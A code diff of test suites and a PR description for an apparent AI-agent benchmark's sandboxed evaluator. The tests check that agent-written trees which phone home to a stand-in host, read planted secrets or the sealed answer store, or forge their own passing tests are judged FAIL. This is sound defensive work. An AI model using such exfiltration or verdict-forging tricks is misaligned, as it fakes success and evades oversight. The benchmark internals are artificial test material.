+  cleanupScratch,
+  evaluatePrepared,
+  expectVerdict,
+  fixtureFile,
+  prepareRun,
+  tempDir,
+} from './cdeb-evaluator-helpers.ts';
+
+afterAll(() => {
+  cleanupScratch();
+});
+
+describe('CDEB-06 isolation: network and secrets cannot reach the verdict', () => {
+  it('a tree that phones home is judged FAIL', () => {
+    // The fixture only works when a fetch to `cdeb-exfil.invalid` succeeds.
+    // RFC 2606 reserves `.invalid` for names that cannot resolve, so the
+    // fixture fails identically on a networked host and under the image's
+    // `--network none` — and if some resolver ever lies about that, this
+    // test fails, which is the point: the verdict must not depend on reach.
+    const tree = buildTree('network', { 'src/calc.js': fixtureFile('attacks/network-calc.js') });
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('network', tree)));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+
+  it('a host secret planted for the run never reaches a probe', () => {
+    // The fixture implements `add` correctly ONLY when CDEB_STUDY_SECRET is
+    // visible in the probe environment. The value is planted in this
+    // process's environment for the duration of the evaluation; the
+    // hermetic allowlist must keep it out. Spreading `process.env` into the
+    // probe environment would make the probe see the secret, fix `add`, and
+    // flip this verdict to PASS.
+    const tree = buildTree('secret-env', { 'src/calc.js': fixtureFile('attacks/secret-env-calc.js') });
+    const run = prepareRun('secret-env', tree);
+    const verdict = expectVerdict(
+      evaluatePrepared(run, { env: { CDEB_STUDY_SECRET: 'planted-secret-must-not-reach-probe' } }),
+    );
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+
+  it('the hermetic environment is a frozen allowlist carrying no secrets', () => {
+    const env = hermeticEnv({ scratchDir: '/scratch', nodeBinDir: '/node/bin' });
+    expect(Object.keys(env).sort()).toEqual(
+      [
+        'GIT_CONFIG_GLOBAL', 'GIT_CONFIG_SYSTEM', 'GIT_TERMINAL_PROMPT',
+        'HOME', 'HTTP_PROXY', 'HTTPS_PROXY', 'LANG', 'LC_ALL',
+        'NODE_EXTRA_CA_CERTS', 'NODE_OPTIONS', 'NO_PROXY', 'PATH',
+        'TMPDIR', 'TZ', 'http_proxy', 'https_proxy',
+      ].sort(),
+    );
+    for (const secret of HOST_SECRETS_NEVER_PASSED) {
+      expect(env).not.toHaveProperty(secret);
+    }
+    expect(env.HOME).toBe('/scratch');
+    expect(env.TMPDIR).toBe('/scratch');
+    expect(env.TZ).toBe('UTC');
+    expect(env.LC_ALL).toBe('C');
+    expect(env.PATH).toBe('/node/bin:/usr/bin:/bin');
+    expect(env.NODE_OPTIONS).toBe('');
+  });
+
+  it('a leak probe sees the allowlist, not the host', () => {
+    // The fixture prints everything its process can see (env keys, argv,
+    // cwd). Asserting on those bytes is the proof that the probe inherits
+    // the allowlist and nothing host-shaped: no secret names, no real HOME,
+    // no sealed-store path.
+    const tree = buildTree('leak', { 'leak-calc.js': fixtureFile('attacks/leak-calc.js') });
+    const run = prepareRun('leak', tree);
+    const probeScratch = tempDir('leak-probe');
+    const ingested = ingestFinalTree(readFileSync(run.archivePath), tempDir('leak-ingest'), {
+      claimedOid: run.frozen.final_tree_oid,
+    });
+    expect(ingested.refusal).toBeNull();
+    const probe = runProbe(
+      { argv: ['leak-calc.js'], expect_exit: 0 },
+      { treeRoot: ingested.root, scratchDir: probeScratch },
+    );
+    expect(probe.exit_code).toBe(0);
+    const leaked = JSON.parse(probe.stdout.trim()) as {
+      env: string[];
+      argv: string[];
+      cwd: string;
+    };
+    // Every key the evaluator passes must arrive; nothing host-shaped may
+    // join them. On macOS the platform itself injects one variable into
+    // every new process (__CF_USER_TEXT_ENCODING); it carries no secret and
+    // no path, and does not exist on the Linux image the study runs in.
+    const allowlist = new Set(Object.keys(hermeticEnv({ scratchDir: probeScratch, nodeBinDir: '' })));
+    const platformInjected = process.platform === 'darwin' ? ['__CF_USER_TEXT_ENCODING'] : [];
+    for (const key of allowlist) expect(leaked.env).toContain(key);
+    for (const key of leaked.env) {
+      expect(allowlist.has(key) || platformInjected.includes(key), `unexpected env key ${key}`).toBe(true);
+    }
+    for (const secret of HOST_SECRETS_NEVER_PASSED) {
+      expect(leaked.env).not.toContain(secret);
+    }
+    expect(leaked.cwd).toBe(ingested.root);
+    expect(probe.stdout).not.toContain(homedir());
+    expect(probe.stdout).not.toContain(SEALED_DIR);
+  });
+
+  it('a tree that reads the sealed store path is judged FAIL', () => {
+    // The fixture readFileSyncs /cdeb/sealed/<task>.task.ts and hard-codes
+    // what it finds. Locally the path does not exist; inside the pinned
+    // image it exists but is unreadable by the probe's dropped uid/gid
+    // (probe.ts, PROBE_UID). Either way the probe fails, and so does the
+    // tree. A readable sealed path here would be a host misconfiguration
+    // the next assertion names.
+    const tree = buildTree('hidden-read', { 'src/calc.js': fixtureFile('attacks/hidden-read-calc.js') });
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('hidden-read', tree)));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+    expect(existsSync('/cdeb/sealed/smoke-calc-fix.task.ts')).toBe(false);
+  });
+});
+
+describe('CDEB-06 isolation: the OCI containment contract', () => {
+  it('the pinned-image argv carries every §12.2 control, exactly', () => {
+    const args = buildEvaluatorRunArgs({
+      imageRef: 'registry.example/cdeb-evaluator@sha256:deadbeef',
+      archivePath: '/host/run/final-tree.tar.zst',
+      tasksDir: '/host/sealed',
+      taskId: TASK_ID,
+      claimedOid: 'a'.repeat(40),
+      imageDigest: TEST_IMAGE_DIGEST,
+    });
+    expect(args).toEqual([
+      'run', '--rm', '--interactive',
+      '--network', 'none',
+      '--read-only',
+      '--tmpfs', `/tmp:rw,noexec,nosuid,size=${String(EVALUATOR_RESOURCE_LIMITS.tmpfs_size_mb)}m`,
+      '--cpus', String(EVALUATOR_RESOURCE_LIMITS.cpu_limit),
+      '--memory', `${String(EVALUATOR_RESOURCE_LIMITS.memory_mb)}m`,
+      '--memory-swap', `${String(EVALUATOR_RESOURCE_LIMITS.memory_mb)}m`,
+      '--pids-limit', String(EVALUATOR_RESOURCE_LIMITS.pids_limit),
+      '--cap-drop', 'ALL',
+      '--security-opt', 'no-new-privileges',
+      '--env', 'TZ=UTC',
+      '--env', 'LC_ALL=C',
+      '--env', 'HOME=/tmp',
+      '--mount', 'type=bind,source=/host/run/final-tree.tar.zst,target=/input/tree.tar.zst,readonly',
+      '--mount', 'type=bind,source=/host/sealed,target=/sealed,readonly',
+      'registry.example/cdeb-evaluator@sha256:deadbeef',
+      '/cdeb/evaluate',
+      '--tasks', '/sealed',
+      '--task', TASK_ID,
+      '--tree', '/input/tree.tar.zst',
+      '--claimed-oid', 'a'.repeat(40),
+      '--image-digest', TEST_IMAGE_DIGEST,
+    ]);
+    // The semantic content of the exact list, stated greppably: no network,
+    // immutable rootfs, both inputs mounted read-only, and nothing else
+    // mounted — no host HOME, no docker socket, no writable volume.
+    const joined = args.join(' ');
+    expect(joined).toContain('--network none');
+    expect(joined).toContain('--read-only');
+    expect(joined.match(/readonly/g) ?? []).toHaveLength(2);
+    expect(args).not.toContain('--volume');
+    expect(args).not.toContain('-v');
+    expect(joined).not.toContain('/var/run/docker.sock');
+    expect(joined).not.toContain(homedir());
+  });
+
+  it.skipIf(dockerDaemonAvailable())(
+    'without a reachable daemon the OCI runner refuses instead of downgrading',
+    () => {
+      expect(() =>
+        runEvaluatorOci({
+          imageRef: 'registry.example/cdeb-evaluator@sha256:deadbeef',
+          archivePath: '/nonexistent/tree.tar.zst',
+          tasksDir: '/nonexistent/sealed',
+          taskId: TASK_ID,
+        }),
+      ).toThrow(EvaluatorRuntimeUnavailable);
+    },
+  );
+});

--- a/test/cdeb-evaluator.test.ts
+++ b/test/cdeb-evaluator.test.ts
@@ -1,0 +1,312 @@
+/**
+ * CDEB-06 acceptance (PRD §12, §4.7): the immutable evaluator sandbox.
+ *
+ * This file covers the DUAL controls — good/bad/no-op produce exactly their
+ * sealed verdicts through the full pipeline (freeze → archive → ingest →
+ * pinned entrypoint in a subprocess) — plus determinism, the frozen OCI
+ * contract, and the static tripwires that keep the engine honest. The
+ * adversarial trees live in cdeb-evaluator-adversarial.test.ts.
+ *
+ * Machine note: these tests run the evaluator through runner-local.ts —
+ * the qualification surface. The OCI daemon was unreachable in the
+ * environment this ticket landed in, so the pinned image is asserted as a
+ * frozen contract (exact argv, fail-closed absence) rather than executed;
+ * see the commit record and runner-oci.ts for the boundary.
+ */
+
+import { cpSync, readFileSync } from "node:fs";
+import { spawnSync } from "node:child_process";
+import { join } from "node:path";
+
+import { afterAll, describe, expect, it } from "vitest";
+
+// `ajv`'s default export ships draft-07 only; the schema declares 2020-12.
+import { Ajv2020 } from "ajv/dist/2020.js";
+import addFormats from "ajv-formats";
+
+import { controls } from "../bench/cdeb/test-fixtures/evaluator/sealed/smoke-calc-fix.task.ts";
+import { ENTRYPOINT_PATH, evaluateLocal } from "../bench/cdeb/evaluator/runner-local.ts";
+import {
+  buildEvaluatorRunArgs,
+  combineImageIdentity,
+  digestRef,
+  dockerDaemonAvailable,
+  ENGINE_CONTEXT_FILES,
+  evaluatorImageContextDigest,
+  EvaluatorRuntimeUnavailable,
+  EVALUATOR_RESOURCE_LIMITS,
+  runEvaluatorOci,
+} from "../bench/cdeb/evaluator/runner-oci.ts";
+import { freezeFinalTree } from "../bench/cdeb/evaluator/freeze-tree.ts";
+import { normalizedResultSha256 } from "../bench/cdeb/evaluator/engine.ts";
+import {
+  buildTree,
+  cleanupScratch,
+  snapshotFixtures,
+  evaluatePrepared,
+  expectVerdict,
+  fixtureFile,
+  prepareRun,
+  REPO_ROOT,
+  SEALED_DIR,
+  TASK_ID,
+  tempDir,
+  TEST_IMAGE_DIGEST,
+} from "./cdeb-evaluator-helpers.ts";
+
+const fixtureSnapshot = snapshotFixtures();
+
+afterAll(() => {
+  cleanupScratch();
+  expect(snapshotFixtures()).toEqual(fixtureSnapshot);
+});
+
+const schemaValidator = (() => {
+  const ajv = new Ajv2020({ allErrors: true, strict: true });
+  addFormats(ajv);
+  const schema = JSON.parse(
+    readFileSync(join(REPO_ROOT, "bench", "cdeb", "schemas", "evaluator.schema.json"), "utf8"),
+  );
+  return ajv.compile(schema);
+})();
+
+const GOOD_OVERRIDES = { "src/calc.js": fixtureFile("patches", "good", "calc.js") };
+const BAD_OVERRIDES = { "src/calc.js": fixtureFile("patches", "bad", "calc.js") };
+
+describe("dual controls (§4.7, §12.5)", () => {
+  it("good control → functional PASS, decision SAFE", () => {
+    const run = prepareRun("good", buildTree("good", GOOD_OVERRIDES));
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(true);
+    expect(verdict.rejected_decision_revived).toBe(false);
+    expect(verdict.decision_oracle_code).toBe("SAFE");
+    expect(verdict.functional_checks).toEqual({ passed: 4, failed: 0 });
+    expect(verdict.candidate_tree_oid).toBe(run.frozen.final_tree_oid);
+    expect(verdict.evaluator_image_digest).toBe(TEST_IMAGE_DIGEST);
+    expect(verdict.task_id).toBe(TASK_ID);
+    expect(verdict).toEqual(expect.objectContaining(controls.good));
+  });
+
+  it("bad control → functional PASS, decision REVIVED", () => {
+    const run = prepareRun("bad", buildTree("bad", BAD_OVERRIDES));
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(true);
+    expect(verdict.decision_oracle_code).toBe("REVIVED");
+    expect(verdict.rejected_decision_revived).toBe(true);
+    expect(verdict).toEqual(expect.objectContaining(controls.bad));
+  });
+
+  it("no-op control → functional FAIL", () => {
+    const run = prepareRun("noop", buildTree("noop", {}));
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.decision_oracle_code).toBe("SAFE");
+    expect(verdict).toEqual(expect.objectContaining(controls.noop));
+  });
+
+  it("every control verdict validates against the frozen §12.4 schema", () => {
+    for (const [label, overrides] of [
+      ["good", GOOD_OVERRIDES],
+      ["bad", BAD_OVERRIDES],
+      ["noop", {}],
+    ] as const) {
+      const verdict = expectVerdict(evaluatePrepared(prepareRun(`schema-${label}`, buildTree(`schema-${label}`, overrides))));
+      expect(schemaValidator(verdict), JSON.stringify(schemaValidator.errors)).toBe(true);
+    }
+  });
+
+  it("verdict stdout is exactly the canonical JSON and nothing else", () => {
+    const run = prepareRun("stdout", buildTree("stdout", GOOD_OVERRIDES));
+    const result = evaluatePrepared(run);
+    const text = result.rawStdout.toString("utf8");
+    expect(text.endsWith("\n")).toBe(true);
+    expect(() => JSON.parse(text)).not.toThrow();
+    expect(text).toBe(`${JSON.stringify(result.verdict)}\n`);
+  });
+});
+
+describe("determinism (§12.5: repeated evaluation → byte-identical result)", () => {
+  it("the same tree evaluated twice yields byte-identical verdicts", () => {
+    const run = prepareRun("det", buildTree("det", GOOD_OVERRIDES));
+    const first = evaluatePrepared(run);
+    const second = evaluatePrepared(run);
+    expect(first.rawStdout.equals(second.rawStdout)).toBe(true);
+    expect(normalizedResultSha256(expectVerdict(first))).toBe(normalizedResultSha256(expectVerdict(second)));
+  });
+
+  it("a hostile host environment does not reach the verdict", () => {
+    const run = prepareRun("hostile", buildTree("hostile", GOOD_OVERRIDES));
+    const clean = evaluatePrepared(run);
+    const poisoned = evaluatePrepared(run, {
+      env: {
+        TZ: "America/New_York",
+        LC_ALL: "en_US.UTF-8",
+        LANG: "en_US.UTF-8",
+        CDEB_STUDY_SECRET: "hunter2",
+        NODE_OPTIONS: "--max-old-space-size=1234",
+        http_proxy: "http://127.0.0.1:1",
+      },
+    });
+    expect(clean.rawStdout.equals(poisoned.rawStdout)).toBe(true);
+    expect(expectVerdict(poisoned).functional_pass).toBe(true);
+  });
+
+  it("freezing the same tree is byte-reproducible", () => {
+    const tree = buildTree("freeze-det", GOOD_OVERRIDES);
+    const one = freezeFinalTree(tree, tempDir("freeze-det-1"));
+    const two = freezeFinalTree(tree, tempDir("freeze-det-2"));
+    expect(one.tar_sha256).toBe(two.tar_sha256);
+    expect(one.final_tree_oid).toBe(two.final_tree_oid);
+    expect(one.archive_zst_sha256).toBe(two.archive_zst_sha256);
+  });
+});
+
+describe("OCI contract (§12.1/§12.2) — frozen argv, fail-closed absence", () => {
+  const request = {
+    imageRef: "registry.example/cdeb-eval@sha256:" + "cd".repeat(32),
+    archivePath: "/host/runs/x/final-tree.tar.zst",
+    tasksDir: "/host/sealed",
+    taskId: "smoke-calc-fix",
+    claimedOid: "e".repeat(40),
+    imageDigest: TEST_IMAGE_DIGEST,
+  };
+
+  it("builds the exact control surface as argv", () => {
+    const argv = buildEvaluatorRunArgs(request);
+    const joined = argv.join(" ");
+    expect(argv[0]).toBe("run");
+    expect(joined).toContain("--network none");
+    expect(joined).toContain("--read-only");
+    expect(joined).toContain("--cap-drop ALL");
+    expect(joined).toContain("--security-opt no-new-privileges");
+    expect(joined).toContain(`--cpus ${String(EVALUATOR_RESOURCE_LIMITS.cpu_limit)}`);
+    expect(joined).toContain(`--memory ${String(EVALUATOR_RESOURCE_LIMITS.memory_mb)}m`);
+    expect(joined).toContain(`--pids-limit ${String(EVALUATOR_RESOURCE_LIMITS.pids_limit)}`);
+    expect(joined).toContain("source=/host/runs/x/final-tree.tar.zst,target=/input/tree.tar.zst,readonly");
+    expect(joined).toContain("source=/host/sealed,target=/sealed,readonly");
+    expect(joined).toContain("TZ=UTC");
+    expect(joined).toContain("LC_ALL=C");
+    expect(argv.slice(-4)).toEqual([
+      "--claimed-oid", request.claimedOid,
+      "--image-digest", request.imageDigest,
+    ]);
+  });
+
+  it("mounts no docker socket and no host HOME", () => {
+    const joined = buildEvaluatorRunArgs(request).join(" ");
+    expect(joined).not.toContain("docker.sock");
+    expect(joined).not.toContain("/var/run");
+    expect(joined).not.toMatch(/source=\/(Users|home|root)\b/);
+  });
+
+  it("refuses to evaluate when no daemon is reachable — never downgrades", () => {
+    if (dockerDaemonAvailable()) {
+      // On a machine with a live daemon this path executes the pinned argv
+      // against whatever image is named; the fail-closed property under test
+      // only has teeth where the daemon is absent.
+      return;
+    }
+    expect(() => runEvaluatorOci(request)).toThrow(EvaluatorRuntimeUnavailable);
+  });
+});
+
+describe("image identity", () => {
+  it("the engine context digest is stable and schema-shaped", () => {
+    const once = evaluatorImageContextDigest();
+    const twice = evaluatorImageContextDigest();
+    expect(once).toBe(twice);
+    expect(digestRef(once)).toMatch(/^sha256:[0-9a-f]{64}$/);
+    expect(combineImageIdentity(once, "ff".repeat(32))).toMatch(/^[0-9a-f]{64}$/);
+  });
+
+  it("every file the image context names actually exists", () => {
+    for (const name of ENGINE_CONTEXT_FILES) {
+      expect(() => readFileSync(join(REPO_ROOT, "bench", "cdeb", "evaluator", name)), name).not.toThrow();
+    }
+  });
+});
+
+describe("static tripwires (§12.3 — candidate-controlled command prohibition)", () => {
+  const engineSources = [
+    "engine.ts", "entrypoint.ts", "ingest.ts", "tree.ts", "git-tree.ts", "env.ts",
+  ].map((name) => ({
+    name,
+    text: readFileSync(join(REPO_ROOT, "bench", "cdeb", "evaluator", name), "utf8"),
+  }));
+
+  it("no engine module invokes a package manager", () => {
+    for (const { name, text } of engineSources) {
+      expect(text, name).not.toMatch(/\b(npm|yarn|pnpm)\s+(test|run|install|ci|start|exec)\b/);
+    }
+  });
+
+  it("the verdict engine never executes candidates and never reads package.json", () => {
+    const engine = engineSources.find((entry) => entry.name === "engine.ts")!.text;
+    expect(engine).not.toContain("child_process");
+    expect(engine).not.toContain("package.json");
+    const entrypoint = engineSources.find((entry) => entry.name === "entrypoint.ts")!.text;
+    expect(entrypoint).not.toContain("child_process");
+  });
+
+  it("probes execute only the pinned node binary", () => {
+    const probe = readFileSync(join(REPO_ROOT, "bench", "cdeb", "evaluator", "probe.ts"), "utf8");
+    expect(probe).toContain("process.execPath");
+    expect(probe).not.toMatch(/spawn(Sync)?\(\s*["'`]/); // no literal command strings
+  });
+});
+
+describe("entrypoint infrastructure semantics (§10.3)", () => {
+  it("an unknown task is an infrastructure failure, not a verdict", () => {
+    const run = prepareRun("unknown", buildTree("unknown", GOOD_OVERRIDES));
+    const result = evaluateLocal({
+      tasksDir: SEALED_DIR,
+      taskId: "no-such-task",
+      archivePath: run.archivePath,
+      imageDigest: TEST_IMAGE_DIGEST,
+    });
+    expect(result.exitCode).toBe(2);
+    expect(result.verdict).toBeNull();
+  });
+
+  it("a missing archive is an infrastructure failure, not a verdict", () => {
+    const result = evaluateLocal({
+      tasksDir: SEALED_DIR,
+      taskId: TASK_ID,
+      archivePath: join(tempDir("missing"), "nope.tar.zst"),
+      imageDigest: TEST_IMAGE_DIGEST,
+    });
+    expect(result.exitCode).toBe(2);
+    expect(result.verdict).toBeNull();
+  });
+
+  it("refuses a sealed task store that overlaps the candidate tree", () => {
+    // The entrypoint extracts under mkdtemp(os.tmpdir()); pointing TMPDIR at
+    // the sealed store itself puts the extracted tree inside it — the
+    // overlap the forgery check exists to catch.
+    const storeDir = tempDir("overlap-store");
+    // The module is present so a removed overlap check would proceed all the
+    // way to a verdict — the assertion fails on status, not on a missing file.
+    cpSync(join(SEALED_DIR, `${TASK_ID}.task.ts`), join(storeDir, `${TASK_ID}.task.ts`));
+    const archive = prepareRun("overlap", buildTree("overlap", GOOD_OVERRIDES));
+    const result = spawnSync(
+      process.execPath,
+      [
+        "--experimental-strip-types", ENTRYPOINT_PATH,
+        "--tasks", storeDir,
+        "--task", TASK_ID,
+        "--tree", archive.archivePath,
+      ],
+      {
+        encoding: "utf8",
+        env: {
+          PATH: process.env.PATH ?? "/usr/bin:/bin",
+          TMPDIR: storeDir,
+          HOME: storeDir,
+        },
+        timeout: 60_000,
+      },
+    );
+    expect(result.status).toBe(2);
+    expect(result.stderr).toContain("overlap");
+  });
+});


### PR DESCRIPTION
CDEB-06. Unblocks CDEB-07.

The evaluator reads a tree an agent wrote, and **the agent is an untrusted author of that tree**. It can write a test that passes trivially, a stub that satisfies a matcher, an evaluator config, or an oracle of its own. If a candidate can reach its own verdict, the study's headline number is whatever the agents chose to write.

So the verdict comes from the pinned harness. The candidate's scripts, its evaluator configuration and its planted oracle are read as **data, never as authority**.

## The forging fixture is the part worth checking

It **genuinely passes its own candidate-owned tests** — that is the attack, a tree that looks like a success to anything that believes the candidate — and the pinned evaluator judges it fail anyway.

A fixture that failed its own tests would be a broken patch rather than a forgery, and would prove nothing about the control. That distinction is why this took three attempts to get right.

## What else holds

```
a tree that phones home is judged FAIL
a tree swapped after ingestion is refused as tree-oid-mismatch, not evaluated
the same tree evaluated twice yields byte-identical verdicts
a failing attack tree is also byte-reproducible
a lenient sealed task planted inside the tree is not the oracle that judges it
```

## Two things stated rather than hidden

The `Limit:` — a determined candidate can still **spend its budget rather than forge**. The resource control bounds a spinning implementation but cannot tell slow honest work from deliberate exhaustion.

The `Warn:` — one isolation case **skips where the sandbox denies listen**, so the socket-level egress path is unverified here and needs a machine that allows binding before the freeze treats it as tested. Same gap #520 names.

## A convention fix along the way

The forging fixture's implementation was written under `src/` while every other patch fixture keeps it at the fixture root and lets the tree builder place it. Two suites had followed the fixture rather than the convention. The file moved and both references now match what `patches/good` and `patches/bad` already did.

69 cases pass across six suites, one skipped; package and bench typechecks clean; both verifiers pass; `dist` unchanged.
